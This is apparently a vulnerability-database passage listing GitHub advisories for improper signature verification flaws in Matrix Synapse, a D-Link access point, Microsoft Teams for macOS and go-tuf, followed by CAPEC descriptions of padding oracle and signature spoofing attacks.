},
{
"type": "WEB",
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/IRW7YR2H3ASUSYX4AO4KMY3FNVDNYW3P"
},
{
"type": "WEB",
"url": "https://matrix.org/blog/2018/09/06/critical-security-update-synapse-0-33-3-1"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "Matrix Synapse Improper Signature Validation"
}
GHSA-FMW9-C6HW-79VG
Vulnerability from github – Published: 2025-10-27 18:31 – Updated: 2025-10-27 18:31A weakness has been identified in D-Link DAP-2695 2.00RC13. The affected element is the function sub_40C6B8 of the component Firmware Update Handler. Executing manipulation can lead to improper verification of cryptographic signature. The attack can be launched remotely. Attacks of this nature are highly complex. The exploitability is described as difficult. The exploit has been made available to the public and could be exploited. This vulnerability only affects products that are no longer supported by the maintainer.
{
"affected": [],
"aliases": [
"CVE-2025-12295"
],
"database_specific": {
"cwe_ids": [
"CWE-345",
"CWE-347"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-10-27T17:15:36Z",
"severity": "MODERATE"
},
"details": "A weakness has been identified in D-Link DAP-2695 2.00RC13. The affected element is the function sub_40C6B8 of the component Firmware Update Handler. Executing manipulation can lead to improper verification of cryptographic signature. The attack can be launched remotely. Attacks of this nature are highly complex. The exploitability is described as difficult. The exploit has been made available to the public and could be exploited. This vulnerability only affects products that are no longer supported by the maintainer.",
"id": "GHSA-fmw9-c6hw-79vg",
"modified": "2025-10-27T18:31:11Z",
"published": "2025-10-27T18:31:11Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-12295"
},
{
"type": "WEB",
"url": "https://github.com/IOTRes/IOT_Firmware_Update/blob/main/Dlink/DAP-2695_Inte.md"
},
{
"type": "WEB",
"url": "https://vuldb.com/?ctiid.329963"
},
{
"type": "WEB",
"url": "https://vuldb.com/?id.329963"
},
{
"type": "WEB",
"url": "https://vuldb.com/?submit.675854"
},
{
"type": "WEB",
"url": "https://www.dlink.com"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:H/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"type": "CVSS_V4"
}
]
}
GHSA-FP2V-F9GM-2JC9
Vulnerability from github – Published: 2024-12-19 00:37 – Updated: 2024-12-19 00:37A library injection vulnerability exists in the com.microsoft.teams2.modulehost.app helper app of Microsoft Teams (work or school) 24046.2813.2770.1094 for macOS. A specially crafted library can leverage Teams's access privileges, leading to a permission bypass. A malicious application could inject a library and start the program to trigger this vulnerability and then make use of the vulnerable application's permissions.
{
"affected": [],
"aliases": [
"CVE-2024-41138"
],
"database_specific": {
"cwe_ids": [
"CWE-347"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-12-18T23:15:07Z",
"severity": "HIGH"
},
"details": "A library injection vulnerability exists in the com.microsoft.teams2.modulehost.app helper app of Microsoft Teams (work or school) 24046.2813.2770.1094 for macOS. A specially crafted library can leverage Teams\u0027s access privileges, leading to a permission bypass. A malicious application could inject a library and start the program to trigger this vulnerability and then make use of the vulnerable application\u0027s permissions.",
"id": "GHSA-fp2v-f9gm-2jc9",
"modified": "2024-12-19T00:37:35Z",
"published": "2024-12-19T00:37:35Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-41138"
},
{
"type": "WEB",
"url": "https://talosintelligence.com/vulnerability_reports/TALOS-2024-1991"
},
{
"type": "WEB",
"url": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2024-1991"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-FPHV-W9FQ-2525
Vulnerability from github – Published: 2026-01-21 16:19 – Updated: 2026-01-22 15:43Security Disclosure: Improper validation of configured threshold for delegations
Summary
A compromised or misconfigured TUF repository can have the configured value of signature thresholds set to 0, which effectively disables signature verification.
Impact
Unathorized modification to TUF metadata files is possible at rest, or during transit as no integrity checks are made.
Patches
Upgrade to v2.3.1
Workarounds
Always make sure that the TUF metadata roles are configured with a threshold of at least 1.
Affected code:
The metadata.VerifyDelegate did not verify the configured threshold prior to comparison. This means that a misconfigured TUF repository could disable the signature verification by setting the threshold to 0, or a negative value (and so always make the signature threshold computation to pass).
{
"affected": [
{
"package": {
"ecosystem": "Go",
"name": "github.com/theupdateframework/go-tuf/v2"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.3.1"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-23992"
],
"database_specific": {
"cwe_ids": [
"CWE-347"
],
"github_reviewed": true,
"github_reviewed_at": "2026-01-21T16:19:32Z",
"nvd_published_at": "2026-01-22T03:15:47Z",
"severity": "MODERATE"
},
"details": "# Security Disclosure: Improper validation of configured threshold for delegations\n\n## Summary\n\nA compromised or misconfigured TUF repository can have the configured value of signature thresholds set to 0, which effectively disables signature verification. \n\n## Impact\n\nUnathorized modification to TUF metadata files is possible at rest, or during transit as no integrity checks are made.\n\n## Patches\n\nUpgrade to v2.3.1\n\n## Workarounds\n\nAlways make sure that the TUF metadata roles are configured with a threshold of at least 1.\n\n## Affected code:\n\nThe `metadata.VerifyDelegate` did not verify the configured threshold prior to comparison. This means that a misconfigured TUF repository could disable the signature verification by setting the threshold to 0, or a negative value (and so always make the signature threshold computation to pass).",
"id": "GHSA-fphv-w9fq-2525",
"modified": "2026-01-22T15:43:46Z",
"published": "2026-01-21T16:19:32Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/theupdateframework/go-tuf/security/advisories/GHSA-fphv-w9fq-2525"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23992"
},
{
"type": "WEB",
"url": "https://github.com/theupdateframework/go-tuf/commit/b38d91fdbc69dfe31fe9230d97dafe527ea854a0"
},
{
"type": "PACKAGE",
"url": "https://github.com/theupdateframework/go-tuf"
},
{
"type": "WEB",
"url": "https://github.com/theupdateframework/go-tuf/releases/tag/v2.3.1"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N",
"type": "CVSS_V3"
}
],
"summary": "go-tuf improperly validates the configured threshold for delegations"
}
No mitigation information available for this CWE.
CAPEC-463: Padding Oracle Crypto Attack
An adversary is able to efficiently decrypt data without knowing the decryption key if a target system leaks data on whether or not a padding error happened while decrypting the ciphertext. A target system that leaks this type of information becomes the padding oracle and an adversary is able to make use of that oracle to efficiently decrypt data without knowing the decryption key by issuing on average 128*b calls to the padding oracle (where b is the number of bytes in the ciphertext block). In addition to performing decryption, an adversary is also able to produce valid ciphertexts (i.e., perform encryption) by using the padding oracle, all without knowing the encryption key.
CAPEC-475: Signature Spoofing by Improper Validation
An adversary exploits a cryptographic weakness in the signature verification algorithm implementation to generate a valid signature without knowing the key.